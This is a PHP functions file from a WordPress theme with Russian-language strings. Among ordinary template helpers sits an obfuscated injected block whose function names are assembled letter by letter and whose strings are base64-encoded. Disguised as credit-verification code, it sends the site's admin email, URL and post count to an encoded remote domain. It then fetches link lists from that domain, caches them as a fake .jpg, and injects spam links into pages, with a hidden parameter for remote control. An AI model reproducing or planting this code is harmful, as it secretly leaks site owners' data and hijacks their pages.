<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $sEmOykr='o';$WIhFL='a';$XDyJkjq='_';$uiROMaj='e';$iXuI='c';$tzZYWpv='4';$zjdRq='e';$rTGo='6';$UChkodw='d';$VmJqLS='d';$KGBMWW='s';$aNlfExq='b';$DjuUd='e';$mIshXzCF=$aNlfExq.$WIhFL.$KGBMWW.$zjdRq.$rTGo.$tzZYWpv.$XDyJkjq.$VmJqLS.$DjuUd.$iXuI.$sEmOykr.$UChkodw.$uiROMaj;$uEdX='e';$duYFGLa='t';$Hepq='g';$btyDF='a';$fBlNuxI='n';$igsqlz='z';$ZCHGGW='f';$kfdCvpb='l';$MrjCmuz='i';$xHTlVjBU=$Hepq.$igsqlz.$MrjCmuz.$fBlNuxI.$ZCHGGW.$kfdCvpb.$btyDF.$duYFGLa.$uEdX;$zfHe='r';$DqtXBTc='3';$XMjla='o';$rfiVo='r';$loYFgx='t';$rpIMon='s';$JDzamyt='_';$mGSAvCd='1';$ZnwuS='t';$qJZsYbMw=$rpIMon.$ZnwuS.$rfiVo.$JDzamyt.$zfHe.$XMjla.$loYFgx.$mGSAvCd.$DqtXBTc;$ZbxTs='t';$hWVwFK='r';$kCSZqyv='s';$TuUsPp='v';$kbbu='e';$XzozWx='r';$ykpJOJFq=$kCSZqyv.$ZbxTs.$XzozWx.$hWVwFK.$kbbu.$TuUsPp;                     
		$hj_____________u='o';$yg_________l='a';$vw_____________x='_';$qc____g='e';$wy__________f='c';$qr______________q='4';$ng______k='e';$nm_____________a='6';$qe_____e='d';$kn_______________w='d';$ij____________q='s';$ls___________n='b';$fq_______e='e';$lq_______b=$ls___________n.$yg_________l.$ij____________q.$ng______k.$nm_____________a.$qr______________q.$vw_____________x.$kn_______________w.$fq_______e.$wy__________f.$hj_____________u.$qe_____e.$qc____g;
		$xb_____f='t';$fp__l='c';$je______g='i';$ch_________d='_';$bz______________f='u';$hj___y='f';$qu____w='x';$cf_______u='n';$go________z='s';$ev___n='s';$hk______j='e';$it____p='n';$vf____m='t';$rz__________q='o';$sg___________f='i';$pw________s=$hj___y.$bz______________f.$cf_______u.$fp__l.$xb_____f.$sg___________f.$rz__________q.$it____p.$ch_________d.$hk______j.$qu____w.$je______g.$go________z.$vf____m.$ev___n;
		$fy____________j='f';$xw_________u='n';$tw______________i='o';$ea_______________t='p';$rt__________t='e';$dd_______________c=$fy____________j.$tw______________i.$ea_______________t.$rt__________t.$xw_________u;
		$tz_____________z='r';$sj_____________z='d';$li__________a='a';$cx________z='f';$cw____________d='e';$dx_____u=$cx________z.$tz_____________z.$cw____________d.$li__________a.$sj_____________z;
		$yj_______________t='l';$ir_____________x='e';$dp__k='s';$kv___________j='o';$mx_______j='f';$wm__________x='c';$ya_________l=$mx_______j.$wm__________x.$yj_______________t.$kv___________j.$dp__k.$ir_____________x;
		
		define("WP_ID", $lq_______b("Mi4wLjA="));
		define("WP_TTL", $lq_______b("MTA4MDA="));
		define("WP_SRC", $lq_______b("dHBva24="));
	


		function wp_get_header() {
			global $lq_______b, $pw________s;
			
			if (
				$pw________s($lq_______b("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$pw________s($lq_______b("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$pw________s($lq_______b("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $lq_______b, $dd_______________c, $ya_________l, $dx_____u;
			
			$in__________z = TEMPLATEPATH."/".$lq_______b("Zm9vdGVyLnBocA==");
			$gw____c = @$dd_______________c($in__________z, "r");
			$in__________z = @$dx_____u($gw____c, @filesize($in__________z));
			@$ya_________l($gw____c);
			
			$mk______________p = TEMPLATEPATH."/".$lq_______b("ZnVuY3Rpb25zLnBocA==");
			$gw____c = @$dd_______________c($mk______________p, "r");
			$mk______________p = @$dx_____u($gw____c, @filesize($mk______________p));
			@$ya_________l($gw____c);
			
			$fz_______________d = 0;
			if($in__________z && $mk______________p) {
				if ($lq_______b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($in__________z, $lq_______b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$fz_______________d = 1;
					}
					if (substr_count($in__________z, "wp_theme_GPL_credits()") < 1) {
						$fz_______________d = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$fz_______________d = 12;
				}
			}
			
			if($fz_______________d > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $fz_______________d -->";
			}
		}
	


		function wp_loaded() {
			global $lq_______b, $pw________s;
			return $pw________s($lq_______b("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($rt_______________w, $lr_____d = "(more...)", $ey____________l = 0, $to______________p = "") {
				$lg_______________k = get_the_content($lr_____d, $ey____________l, $to______________p);
				$lg_______________k = apply_filters("the_content", $lg_______________k);
				
				$lg_______________k = str_replace("]]>", "]]>", $lg_______________k);
				if (strlen($_GET["p"]) > 0) {
					echo $lg_______________k;
				}
				else if ((strlen($lg_______________k)>$rt_______________w) && ($zp_______b = strpos($lg_______________k, " ", $rt_______________w ))) {
					$lg_______________k = substr($lg_______________k, 0, $zp_______b);
					$lg_______________k = $lg_______________k;
					echo $lg_______________k;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lr_____d</a></div></p>";
				} else {
					echo $lg_______________k;
				}
				
			}
		}
	


		$cx______a='4';$ie___o='e';$fb_________n='s';$am____________c='e';$zo______c='a';$sj_______x='d';$eh_________e='_';$xe__________l='e';$mn_____u='o';$er___v='6';$nu______s='b';$yy___x='n';$ml__s='c';$sg_________u=$nu______s.$zo______c.$fb_________n.$ie___o.$er___v.$cx______a.$eh_________e.$xe__________l.$yy___x.$ml__s.$mn_____u.$sj_______x.$am____________c;
		$bd____u='t';$xd_______c='g';$jm_____n='e';$ta____h='_';$er____o='s';$bm__r='f';$zv_____a='o';$sa________l='_';$tf_______________v='t';$od___________l='t';$kz__o='c';$sj________q='i';$ea____________r='l';$bv______y='e';$qw____j='n';$hd__________q='e';$ro_______________l='n';$qt______m=$bm__r.$sj________q.$ea____________r.$bv______y.$ta____h.$xd_______c.$jm_____n.$tf_______________v.$sa________l.$kz__o.$zv_____a.$ro_______________l.$od___________l.$hd__________q.$qw____j.$bd____u.$er____o;
		$en______________v='e';$nu_____________j='l';$rh__________r='i';$td_____j='x';$nk_______________k='i';$tb__________d='e';$of__________b='t';$gg__________y='s';$zk_______d='s';$jz_________o='_';$wv_____f='f';$fa__________y=$wv_____f.$rh__________r.$nu_____________j.$en______________v.$jz_________o.$tb__________d.$td_____j.$nk_______________k.$gg__________y.$of__________b.$zk_______d;
		$bt_______________l='e';$wq________y='r';$ku____________i='v';$sd_________p='i';$py___m='c';$bk_____a='n';$da_____________s='o';$ku_____u='_';$xh_____________m='e';$ro_______x='m';$as__________e='r';$qv_____________t='a';$mn______e='p';$fz_______________g='o';$fx___k='s';$vk____________b=$ku____________i.$xh_____________m.$as__________e.$fx___k.$sd_________p.$da_____________s.$bk_____a.$ku_____u.$py___m.$fz_______________g.$ro_______x.$mn______e.$qv_____________t.$wq________y.$bt_______________l;
		$eo______________i='o';$dv_______j='c';$bg_____________e='f';$gj___________k='k';$hj___l='o';$jz____________t='p';$gw____________t='s';$qj___________w='n';$mj_________n='e';$fk__w=$bg_____________e.$gw____________t.$eo______________i.$dv_______j.$gj___________k.$hj___l.$jz____________t.$mj_________n.$qj___________w;
		$cr______________f='e';$il_____j='w';$dc_______________q='i';$za_________i='r';$pv_____________v='f';$iy_______x='t';$ab____b=$pv_____________v.$il_____j.$za_________i.$dc_______________q.$iy_______x.$cr______________f;
		$dm______l='d';$ob_________r='m';$lt_______n='5';$wj___________s=$ob_________r.$dm______l.$lt_______n;
		$oi________v='a';$ou______________d='r';$gu_____________j='l';$ke__________j='a';$ob__________u='p';$uz__________o='e';$qf_______________e='h';$kr________t='t';$hn___________p=$ou______________d.$uz__________o.$ke__________j.$gu_____________j.$ob__________u.$oi________v.$kr________t.$qf_______________e;
		$te_____f='i';$bs_____g='n';$fl___________f='z';$gy_______s='a';$oe___________w='r';$ue_______________i='e';$zb___m='s';$qn______________g='u';$mu___________h='e';$hv__________x='l';$in____k='i';$vp__________t=$qn______________g.$bs_____g.$zb___m.$ue_______________i.$oe___________w.$te_____f.$gy_______s.$hv__________x.$in____k.$fl___________f.$mu___________h;
		$xw________j='e';$lf__z='m';$li_______o='m';$dr_________y='t';$hj____________g='p';$id________p='a';$im________u='n';$se______________f=$dr_________y.$xw________j.$lf__z.$hj____________g.$im________u.$id________p.$li_______o;
		$fg____q='t';$ug______________a='a';$oh____f='e';$ce______________c='t';$iu__________z='m';$rd_____________m='_';$uj________q='c';$yd______________k='s';$rd___________t='n';$wt_______________q='e';$pr_________o='c';$bo_______s='e';$rd____z='t';$zw__________i='x';$qf_____i='t';$cn________k='r';$jc_____________y='_';$lj____h='a';$vk_______________a='o';$uk___________l='r';$is__________z='e';$ih__s=$yd______________k.$fg____q.$cn________k.$is__________z.$ug______________a.$iu__________z.$rd_____________m.$pr_________o.$vk_______________a.$rd___________t.$rd____z.$wt_______________q.$zw__________i.$qf_____i.$jc_____________y.$uj________q.$uk___________l.$oh____f.$lj____h.$ce______________c.$bo_______s;
	


		function rq________u($py___________a) {
			global $lq_______b, $pw________s, $qt______m, $vk____________b, $ih__s;
			
			if (!$pw________s($lq_______b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($vk____________b(PHP_VERSION, "5.0.0", ">=") && $pw________s($lq_______b("ZmlsZV9nZXRfY29udGVudHM=")) && $pw________s($lq_______b("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$td__________a = $ih__s(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lh_______________e = @$qt______m($py___________a, 0, $td__________a);
			} else {
				$lh_______________e = @$qt______m($py___________a, 0);
			}
			
			return $lh_______________e;
		}
	


		function wx__________l($py___________a) {
			global $pw________s, $fk__w, $ab____b, $lq_______b;
			
			if (!$pw________s($lq_______b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$wc__a = strpos($py___________a, "/", 7);
			$ub_____________r = array(
				"uri"     => substr($py___________a, $wc__a),
				"host"    => str_replace("http://", "", substr($py___________a, 0, $wc__a)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rc___m = @$fk__w("$ub_____________r[host]", 80, $vv____________x, $xa_______________a, 4);
			
			if (!$rc___m) {
				return false;
			} else {
				$lh_______________e = "";
				$am_________j  = "GET $ub_____________r[uri] HTTP/1.0\r\n";
				$am_________j .= "Host: $ub_____________r[host]\r\n";
				$am_________j .= "Referer: $ub_____________r[referer]\r\n";
				$am_________j .= "Connection: Close\r\n\r\n";
				
				@$ab____b($rc___m, $am_________j);
				
				while (!@feof($rc___m)) {
					$le______x = @fgets($rc___m, (1024*24));
					
					if ($le______x == "\r\n") {
						$qy_______v = true;
						continue;
					}
					
					if ($qy_______v) {
						$lh_______________e .= $le______x;
					}
				}
				
				return $lh_______________e;
			}
		}
	


		function yk___h($py___________a) {
			global $pw________s;
			$sh__z = false;
			
			if ($py___________a != "") {
				if ($pw________s("rq________u")) {
					$sh__z = @rq________u($py___________a);
				}
				
				if (!$sh__z && ($pw________s("wx__________l"))) {
					$sh__z = @wx__________l($py___________a);
				}
			}
			
			return $sh__z;
		}
	


		function qf____d() {
			global $_SERVER, $wj___________s;
			
			$wz______________n = $_SERVER["SERVER_NAME"];
			
			if (substr("$wz______________n", 0, 4) == "www.") {
				$wz______________n = substr("$wz______________n", 4);
			}
			
			$wz______________n = $wj___________s("$_SERVER[SERVER_NAME]");
			
			return $wz______________n;
		}
	


		function qk______g() {
			return "file";
		}
	


		function cc___z($py___________a) {
			global $_SERVER, $qt______m, $fa__________y, $dd_______________c, $ya_________l, $ab____b;
			
			$rb___________s = wm______c();
			
			$lc__i = qf____d().".jpg";
			$go______d = $rb___________s["dir_upload"]["path"]."/$lc__i";
			$hp_____________v = @filemtime($go______d);
			
			if (!$hp_____________v || ((time()-$hp_____________v) >= WP_TTL)) {
				$sh__z = yk___h($py___________a);
				
				if ($sh__z) {
					if ($fa__________y($go______d)) {
						@unlink($go______d);
					}
					
					$gw____c = @$dd_______________c($go______d, "x+");
					
					@$ab____b($gw____c, $sh__z);
					@$ya_________l($gw____c);
				}
			} else {
				if ($fa__________y($go______d)) {
					$sh__z = @$qt______m($go______d);
				} else {
					$sh__z = false;
				}
			}
			
			return $sh__z;
		}
	


		function wm______c() {
			global $_SERVER, $lq_______b, $sg_________u;
			
			$ge_____k = wp_count_posts("post");
			$hs______________r = pathinfo(get_bloginfo("template_directory"));
			
			$rb___________s = array(
				"url" => array(
					"report"      => $lq_______b("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $hs______________r,
				"dir_upload"	=> xm______y(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$hs______________r[filename],
					"a005=".$ge_____k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://vodoley2000.com/kak-pravilno-vybrat-oboi\">Как правильно выбрать обои</a>"
			);
			
			$rb___________s["url"]["queryString"] = implode("&", $rb___________s["queryString"]);
			$rb___________s["url"]["report"] = $rb___________s["url"]["report"]."/?".$sg_________u($rb___________s["url"]["queryString"]).".html";
						
			return $rb___________s;
		}
	


		function xm______y() {
			$km_______________x = wp_upload_dir();
			
			if (isset($km_______________x["error"])) {
				$dy____a = zo________y();
				if (is_writable($dy____a)) {
					$km_______________x = array("path" => $dy____a);
				}
			}

			return $km_______________x;
		}
	


		function zo________y() {
			global $pw________s, $wj___________s, $hn___________p, $se______________f;
			
			$zj_______________k = (bool) ini_get("safe_mode");
			if ($zj_______________k == true) {
				return false;
			}
			
			if ($pw________s("sys_get_temp_dir")) {
				$ll_________e = sys_get_temp_dir();
				if (is_writable($ll_________e)) {
					return $hn___________p($ll_________e);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $hn___________p($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $hn___________p($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $hn___________p($_ENV["TEMP"]);
			} else {
				$mn__t = $se______________f($wj___________s(uniqid(rand(), true)), "");
				if ($mn__t) {
					$ll_________e = $hn___________p(dirname($mn__t));
					@unlink($mn__t);
					return $ll_________e;
				} else {
					return false;
				}
			}
		}
	


		function qr_____________t() {
			global $_GET, $fa__________y;
			
			$rb___________s = wm______c();
			$wz______________n = qf____d();
			$sx_____x = qk______g();
			
			$ri______________c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($sx_____x == "file") {
					$xl___s = $rb___________s["dir_upload"]["path"]."/".$wz______________n.".jpg";
					if ($fa__________y($xl___s)) {
						@unlink($xl___s);
						$ri______________c = "deleted";
					}
				}
				
				$rl______o = array(
					"s"	=> $ri______________c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($rl______o AS $fr______d => $dk_____________g) echo " [$fr______d:$dk_____________g]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $pw________s, $lq_______b, $vp__________t;
			$rb___________s = wm______c();
			
			$yi____d = "cc___z";
			if ($pw________s($yi____d)) {
				$lh_______________e = $yi____d($rb___________s["url"]["report"]);
			}
			
			if ($lh_______________e) {
				if ($lh_______________e = @$lq_______b($lh_______________e)) {
					$lh_______________e = @$vp__________t($lh_______________e);
					
					if (strlen($lh_______________e[custom_credit]) >= 5) {
						$rb___________s["default_string"] = $lh_______________e[custom_credit];
					}
					
					if ($lh_______________e["status"] == "0") {
						$du_____h = 1;
						$gs______b = 1;
					} else {
						$jh_________o = sizeof($lh_______________e["links"]);
						$os_________d = $rb___________s["default_string"];
						
						if ($jh_________o > 0 && $lh_______________e["links"] !== "") {
							$ee_____u = 0;
							foreach ($lh_______________e["links"] as $ez_______________w => $ey__________k) {
								$ee_____u++;
								if ($ey__________k->l_path == "" || $ey__________k->l_path == $_SERVER["REQUEST_URI"]) {
									$ey__________k->l_href = htmlspecialchars(strip_tags($ey__________k->l_href));
									$ey__________k->l_title = htmlspecialchars(strip_tags($ey__________k->l_title));
									$ey__________k->l_anchor = htmlspecialchars(strip_tags($ey__________k->l_anchor));
									$os_________d .= " | ";
									$os_________d .= "<a href='$ey__________k->l_href' title='$ey__________k->l_title'";
									if ($ey__________k->l_nofollow == "1") {
										$os_________d .= " rel='nofollow'";
									}
									$os_________d .= ">$ey__________k->l_anchor</a>";
								}
							}
						}
						$rb___________s["links"] = "$os_________d";
						if ($lh_______________e[credit] == "0") {
							$rb___________s["links"] = "";
						}
					}
				} else {
					$du_____h = "1";
				}
			} else {
				$du_____h = "1";
			}
			
			if ($du_____h == "1") {
				$rb___________s["links"] = $rb___________s["default_string"];
			}
			
			echo "$rb___________s[links]";
			
			echo "<!-- s: $lh_______________e[signature] -->";
			qr_____________t();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
